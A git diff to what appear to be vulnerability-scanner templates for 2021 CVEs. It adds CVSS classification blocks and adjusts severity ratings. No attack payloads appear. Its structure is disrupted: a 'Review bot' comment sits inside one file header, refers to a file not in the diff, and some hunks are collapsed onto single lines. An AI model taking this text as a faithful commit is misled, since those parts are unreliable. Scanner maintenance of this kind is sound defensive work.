diff --git a/cves/2021/CVE-2021-20092.yaml b/cves/2021/CVE-2021-20092.yaml
index a419448255..72246e7705 100644
--- a/cves/2021/CVE-2021-20092.yaml
+++ b/cves/2021/CVE-2021-20092.yaml
@@ -3,7 +3,7 @@ id: CVE-2021-20092
info:
name: Buffalo WSR-2533DHPL2 - Improper Access Control
author: gy741,pdteam,parth
- severity: critical
+ severity: high
description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
reference:
@@ -11,6 +11,11 @@ info:
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-20092
+ cwe-id: CWE-200
requests:
- raw:
diff --git a/cves/2021/CVE-2021-20114.yaml b/cves/2021/CVE-2021-20114.yaml
index 981a841397..1d17cd2a0e 100644
--- a/cves/2021/CVE-2021-20114.yaml
+++ b/cves/2021/CVE-2021-20114.yaml
@@ -10,6 +10,11 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-20114
tags: cve,cve2021,tcexam,disclosure
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-20114
+ cwe-id: CWE-200
requests:
- method: GET
path:
diff --git a/cves/2021/CVE-2021-21234.yaml b/cves/2021/CVE-2021-21234.yaml
index cbfbd7cb86..182a3934d7 100644
--- a/cves/2021/CVE-2021-21234.yaml
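Review bot: The classification block added to CVE-2021-20091.yaml carries `cvss-metrics`, `cvss-score` and `cve-id` but no `cwe-id`, unlike every other classification block in this commit; CVE-2021-22986.yaml further down has the same four-line shape. If the upstream record genuinely assigns no CWE, a one-line comment such as `# cwe-id omitted: no CWE published for this CVE` would mark the omission as deliberate rather than a copy-paste miss; if a CWE does exist, add the `cwe-id:` line so the block matches its siblings. The `info:` mapping these lines belong to starts above the hunk.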
+++ b/cves/2021/CVE-2021-21234.yaml
@@ -10,6 +10,11 @@ info:
- https://github.com/cristianeph/vulnerability-actuator-log-viewer
- https://nvd.nist.gov/vuln/detail/CVE-2021-21234
tags: cve,cve2021,springboot,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 7.70
+ cve-id: CVE-2021-21234
+ cwe-id: CWE-22
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml
index 83f46804d2..53b683b142 100644
--- a/cves/2021/CVE-2021-21307.yaml
+++ b/cves/2021/CVE-2021-21307.yaml
@@ -10,6 +10,11 @@ info:
- https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-21307
tags: cve,cve2021,rce,lucee,adobe
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-21307
+ cwe-id: CWE-862
requests:
- raw:
diff --git a/cves/2021/CVE-2021-21315.yaml b/cves/2021/CVE-2021-21315.yaml
index 13d9c5e2c7..a2289106db 100644
--- a/cves/2021/CVE-2021-21315.yaml
+++ b/cves/2021/CVE-2021-21315.yaml
@@ -9,6 +9,11 @@ info:
- https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
- https://security.netapp.com/advisory/ntap-20210312-0007/
tags: nodejs,cve,cve2021
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.80
+ cve-id: CVE-2021-21315
+ cwe-id: CWE-78
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-21389.yaml b/cves/2021/CVE-2021-21389.yaml
index adec07c32f..5d83282a56 100644
--- a/cves/2021/CVE-2021-21389.yaml
+++ b/cves/2021/CVE-2021-21389.yaml
@@ -3,7 +3,7 @@ id: CVE-2021-21389
info:
name: BuddyPress REST API Privilege Escalation to RCE
author: lotusdll
- severity: critical
+ severity: high
description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE
reference:
- https://github.com/HoangKien1020/CVE-2021-21389
@@ -11,6 +11,11 @@ info: - https://codex.buddypress.org/releases/version-7-2-1/ - https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3 tags: cve,cve2021,wordpress,wp-plugin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-21389 + cwe-id: CWE-863 requests: diff --git a/cves/2021/CVE-2021-21402.yaml b/cves/2021/CVE-2021-21402.yaml index 816303d5e5..c3c29e4665 100644 --- a/cves/2021/CVE-2021-21402.yaml +++ b/cves/2021/CVE-2021-21402.yaml @@ -3,13 +3,18 @@ id: CVE-2021-21402 info: name: Jellyfin prior to 10.7.0 Unauthenticated Arbitrary File Read author: dwisiswant0 - severity: high + severity: medium description: | Jellyfin allows unauthenticated arbitrary file read. This issue is more prevalent when Windows is used as the host OS. Servers that are exposed to the public Internet are potentially at risk. This is fixed in version 10.7.1. reference: https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/ tags: cve,cve2021,jellyfin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2021-21402 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml index 5d60f46f48..befe4c3526 100644 --- a/cves/2021/CVE-2021-21479.yaml +++ b/cves/2021/CVE-2021-21479.yaml @@ -9,6 +9,11 @@ info: In SCIMono before 0.0.19, it is possible for an attacker to inject and execute java expression compromising the availability and integrity of the system. tags: cve,cve2021,scimono,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.10 + cve-id: CVE-2021-21479 + cwe-id: CWE-74 requests: - method: GET diff --git a/cves/2021/CVE-2021-21801.yaml b/cves/2021/CVE-2021-21801.yaml index 338eccbd88..7168dc705a 100644 --- a/cves/2021/CVE-2021-21801.yaml +++ b/cves/2021/CVE-2021-21801.yaml 
@@ -7,6 +7,11 @@ info:
description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
tags: cve,cve2021,r-seenet,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-21801
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-21802.yaml b/cves/2021/CVE-2021-21802.yaml
index a3eeb5f61e..a17edd857e 100644
--- a/cves/2021/CVE-2021-21802.yaml
+++ b/cves/2021/CVE-2021-21802.yaml
@@ -7,6 +7,11 @@ info:
description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
tags: cve,cve2021,r-seenet,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-21802
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-21803.yaml b/cves/2021/CVE-2021-21803.yaml
index 93a8fcf35e..1068d20cde 100644
--- a/cves/2021/CVE-2021-21803.yaml
+++ b/cves/2021/CVE-2021-21803.yaml
@@ -7,6 +7,11 @@ info:
description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
tags: cve,cve2021,r-seenet,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-21803
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-21816.yaml b/cves/2021/CVE-2021-21816.yaml
index e8df776430..de4ad69f3f 100644
--- a/cves/2021/CVE-2021-21816.yaml
+++ b/cves/2021/CVE-2021-21816.yaml
@@ -7,6 +7,11 @@ info:
severity: medium
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281
tags: cve,cve2021,dlink,exposure,router
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
+ cvss-score: 4.30
+ cve-id: CVE-2021-21816
+ cwe-id: CWE-922
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-21972.yaml b/cves/2021/CVE-2021-21972.yaml
index 4e9eb24eec..d69c8904d3 100644
--- a/cves/2021/CVE-2021-21972.yaml
+++ b/cves/2021/CVE-2021-21972.yaml
@@ -7,6 +7,11 @@ info:
reference: https://swarm.ptsecurity.com/unauth-rce-vmware/
description: The vulnerability allows unauthenticated remote attackers to upload files leading to remote code execution (RCE). This templates only detects the plugin.
tags: cve,cve2021,vmware,rce
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-21972
+ cwe-id: CWE-269
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-21975.yaml b/cves/2021/CVE-2021-21975.yaml
index e7337d9775..043597989c 100644
--- a/cves/2021/CVE-2021-21975.yaml
+++ b/cves/2021/CVE-2021-21975.yaml
@@ -3,10 +3,15 @@ id: CVE-2021-21975 info: name: vRealize Operations Manager API SSRF (VMWare Operations) author: luci - severity: critical + severity: high description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983. tags: cve,cve2021,ssrf,vmware,vrealize reference: https://www.vmware.com/security/advisories/VMSA-2021-0004.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-21975 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2021/CVE-2021-21978.yaml b/cves/2021/CVE-2021-21978.yaml index 396c5b2fbc..5dc7d8641b 100644 --- a/cves/2021/CVE-2021-21978.yaml +++ b/cves/2021/CVE-2021-21978.yaml @@ -11,6 +11,11 @@ info: An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container. tags: cve,cve2021,vmware,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21978 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml index ad807159dc..3c61e44f64 100644 --- a/cves/2021/CVE-2021-21985.yaml +++ b/cves/2021/CVE-2021-21985.yaml @@ -11,6 +11,11 @@ info: - https://www.vmware.com/security/advisories/VMSA-2021-0010.html - https://github.com/alt3kx/CVE-2021-21985_PoC tags: cve,cve2021,rce,vsphere + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21985 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2021/CVE-2021-22122.yaml b/cves/2021/CVE-2021-22122.yaml index 53c6058203..83ca4f6d61 100644 --- a/cves/2021/CVE-2021-22122.yaml +++ b/cves/2021/CVE-2021-22122.yaml 
@@ -11,6 +11,11 @@ info:
- https://www.fortiguard.com/psirt/FG-IR-20-122
- https://twitter.com/ptswarm/status/1357316793753362433
tags: cve,cve2021,fortiweb,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-22122
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-22145.yaml b/cves/2021/CVE-2021-22145.yaml
index e018f535d1..3a38bddc00 100644
--- a/cves/2021/CVE-2021-22145.yaml
+++ b/cves/2021/CVE-2021-22145.yaml
@@ -10,6 +10,11 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22145
- https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html
tags: cve,cve2021,elascticsearch
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.50
+ cve-id: CVE-2021-22145
+ cwe-id: CWE-209
requests:
- method: POST
diff --git a/cves/2021/CVE-2021-22214.yaml b/cves/2021/CVE-2021-22214.yaml
index b4e407b056..f1fcc89ba3 100644
--- a/cves/2021/CVE-2021-22214.yaml
+++ b/cves/2021/CVE-2021-22214.yaml
@@ -3,13 +3,18 @@ id: CVE-2021-22214
info:
author: Suman_Kar
name: Unauthenticated Gitlab SSRF - CI Lint API
- severity: medium
+ severity: high
description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
- https://docs.gitlab.com/ee/api/lint.html
tags: cve,cve2021,gitlab,ssrf,oob
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.60
+ cve-id: CVE-2021-22214
+ cwe-id: CWE-918
requests:
- raw:
diff --git a/cves/2021/CVE-2021-22873.yaml b/cves/2021/CVE-2021-22873.yaml
index ba23365c25..f0ccf1f6b7 100644
--- a/cves/2021/CVE-2021-22873.yaml
+++ b/cves/2021/CVE-2021-22873.yaml
@@ -3,10 +3,15 @@ id: CVE-2021-22873
info:
name: Revive Adserver < 5.1.0 Open Redirect
author: pudsec
- severity: low
+ severity: medium
description: Revive Adserver before 5.1.0 is vulnerable to open redirects via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-22873
tags: cve,cve2021,redirect
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-22873
+ cwe-id: CWE-601
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-22986.yaml b/cves/2021/CVE-2021-22986.yaml
index 508e2fda49..230b015a29 100644
--- a/cves/2021/CVE-2021-22986.yaml
+++ b/cves/2021/CVE-2021-22986.yaml
@@ -8,6 +8,10 @@ info:
reference:
- https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
- https://support.f5.com/csp/article/K03009991
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-22986
requests:
- raw:
diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml
index 67b62f066e..da0426c806 100644
--- a/cves/2021/CVE-2021-23241.yaml
+++ b/cves/2021/CVE-2021-23241.yaml
@@ -9,6 +9,11 @@ info:
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241
tags: cve,cve2021,iot,lfi,router
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.30
+ cve-id: CVE-2021-23241
+ cwe-id: CWE-22
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-24146.yaml b/cves/2021/CVE-2021-24146.yaml
index c950e67161..61d3d453df 100644
--- a/cves/2021/CVE-2021-24146.yaml
+++ b/cves/2021/CVE-2021-24146.yaml
@@ -7,6 +7,11 @@ info: severity: high reference: https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc tags: wordpress,wp-plugin,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.50 + cve-id: CVE-2021-24146 + cwe-id: CWE-284 requests: - method: GET diff --git a/cves/2021/CVE-2021-24176.yaml b/cves/2021/CVE-2021-24176.yaml index 54bede3572..1d03f5739e 100644 --- a/cves/2021/CVE-2021-24176.yaml +++ b/cves/2021/CVE-2021-24176.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585 - https://wordpress.org/plugins/jh-404-logger/ tags: cve,cve2021,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2021-24176 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24210.yaml b/cves/2021/CVE-2021-24210.yaml index faca3d5383..50b0897459 100644 --- a/cves/2021/CVE-2021-24210.yaml +++ b/cves/2021/CVE-2021-24210.yaml @@ -9,8 +9,13 @@ info: ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only go to whitelisted pages but it's possible to redirect the victim to any domain. reference: https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb - severity: low + severity: medium tags: wordpress,cve,cve2021,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24210 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-24235.yaml b/cves/2021/CVE-2021-24235.yaml index 6da6293c88..1178e0035a 100644 --- a/cves/2021/CVE-2021-24235.yaml +++ b/cves/2021/CVE-2021-24235.yaml 
@@ -6,6 +6,12 @@ info:
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24235
tags: cve,cve2021,wordpress,xss,wp-theme
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24235
+ cwe-id: CWE-79
+ description: "The Goto WordPress theme before 2.0 does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue."
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-24237.yaml b/cves/2021/CVE-2021-24237.yaml
index 365eb7c2d9..c9842dc7c4 100644
--- a/cves/2021/CVE-2021-24237.yaml
+++ b/cves/2021/CVE-2021-24237.yaml
@@ -9,6 +9,11 @@ info:
reference:
- https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
- https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24237
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-24285.yaml b/cves/2021/CVE-2021-24285.yaml
index 7fb471bc6f..d620d2d396 100644
--- a/cves/2021/CVE-2021-24285.yaml
+++ b/cves/2021/CVE-2021-24285.yaml
@@ -10,6 +10,11 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-24285
- https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
- https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-24285
+ cwe-id: CWE-89
requests:
- raw:
diff --git a/cves/2021/CVE-2021-24288.yaml b/cves/2021/CVE-2021-24288.yaml
index d5b21f2ecd..5b0b13cded 100644
--- a/cves/2021/CVE-2021-24288.yaml
+++ b/cves/2021/CVE-2021-24288.yaml
@@ -7,6 +7,11 @@ info:
description: When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully go through with the subscription.
reference: https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97
tags: wordpress,cve,cve2021,redirect,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24288
+ cwe-id: CWE-601
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-24291.yaml b/cves/2021/CVE-2021-24291.yaml
index 3d7e73cfbc..736f309f8a 100644
--- a/cves/2021/CVE-2021-24291.yaml
+++ b/cves/2021/CVE-2021-24291.yaml
@@ -7,6 +7,11 @@ info:
reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a
severity: medium
tags: cve,cve2021,xss,wordpress,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24291
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-24298.yaml b/cves/2021/CVE-2021-24298.yaml
index 40b4fa673f..21462431a1 100644
--- a/cves/2021/CVE-2021-24298.yaml
+++ b/cves/2021/CVE-2021-24298.yaml
@@ -7,6 +7,11 @@ info:
description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24298
tags: cve,cve2021,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24298
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-24316.yaml b/cves/2021/CVE-2021-24316.yaml
index f4b9b78af4..9d76374f71 100644
--- a/cves/2021/CVE-2021-24316.yaml
+++ b/cves/2021/CVE-2021-24316.yaml
@@ -9,6 +9,11 @@ info:
reference:
- https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
- https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24316
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-24320.yaml b/cves/2021/CVE-2021-24320.yaml
index 408f23de62..458e6b28e6 100644
--- a/cves/2021/CVE-2021-24320.yaml
+++ b/cves/2021/CVE-2021-24320.yaml
@@ -9,6 +9,11 @@ info:
- https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
- https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
tags: cve,cve2021,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24320
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-24335.yaml b/cves/2021/CVE-2021-24335.yaml
index 960dfbe32b..89d2be4bec 100644
--- a/cves/2021/CVE-2021-24335.yaml
+++ b/cves/2021/CVE-2021-24335.yaml
@@ -7,6 +7,11 @@ info:
description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24335
tags: cve,cve2021,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24335
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-24340.yaml b/cves/2021/CVE-2021-24340.yaml
index a20c217e53..498fb61986 100644
--- a/cves/2021/CVE-2021-24340.yaml
+++ b/cves/2021/CVE-2021-24340.yaml
@@ -3,13 +3,18 @@ id: CVE-2021-24340
info:
name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection
author: lotusdll
- severity: critical
+ severity: high
description: The WP Statistic WordPress plugin was affected by an Unauthenticated Time-Based Blind SQL Injection security vulnerability.
reference:
- https://www.exploit-db.com/exploits/49894
- https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
- https://github.com/Udyz/WP-Statistics-BlindSQL
tags: cve,cve2021,wordpress,wp-plugin,unauth,sqli,blind
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-24340
+ cwe-id: CWE-89
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-24387.yaml b/cves/2021/CVE-2021-24387.yaml
index fa60b34342..8d0e643b50 100644
--- a/cves/2021/CVE-2021-24387.yaml
+++ b/cves/2021/CVE-2021-24387.yaml
@@ -10,6 +10,11 @@ info:
severity: medium
tags: cve,cve2021,xss,wordpress
reference: https://cxsecurity.com/issue/WLB-2021070041
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24387
+ cwe-id: CWE-79
requests:
- raw:
diff --git a/cves/2021/CVE-2021-24389.yaml b/cves/2021/CVE-2021-24389.yaml
index 3b6b1bb833..024f7e7b87 100644
--- a/cves/2021/CVE-2021-24389.yaml
+++ b/cves/2021/CVE-2021-24389.yaml
@@ -7,6 +7,11 @@ info:
description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389
tags: cve,cve2021,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24389
+ cwe-id: CWE-79
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-24406.yaml b/cves/2021/CVE-2021-24406.yaml
index 5ef2b21f2c..5663561a64 100644
--- a/cves/2021/CVE-2021-24406.yaml
+++ b/cves/2021/CVE-2021-24406.yaml
@@ -5,8 +5,13 @@ info:
author: 0x_Akoko
description: The plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login.
reference: https://wpscan.com/vulnerability/a9284931-555b-4c96-86a3-09e1040b0388
- severity: low
+ severity: medium
tags: wordpress,redirect,cve,cve2021
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24406
+ cwe-id: CWE-601
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-24472.yaml b/cves/2021/CVE-2021-24472.yaml
index b45ea11b81..634ca3ad27 100644
--- a/cves/2021/CVE-2021-24472.yaml
+++ b/cves/2021/CVE-2021-24472.yaml
@@ -4,9 +4,14 @@ info:
author: Suman_Kar
name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Unauthenticated RFI and SSRF
description: The theme and plugin have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this would allow for SSRF (Server Side Request Forgery) and RFI (Remote File Inclusion) vulnerabilities on the website.
- severity: high
+ severity: critical
reference: https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a
tags: cve,cve2021,wordpress,lfi,ssrf,oob
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-24472
+ cwe-id: CWE-918
requests:
- raw:
diff --git a/cves/2021/CVE-2021-24495.yaml b/cves/2021/CVE-2021-24495.yaml
index 4a5b9a1610..19e4bf5b0d 100644
--- a/cves/2021/CVE-2021-24495.yaml
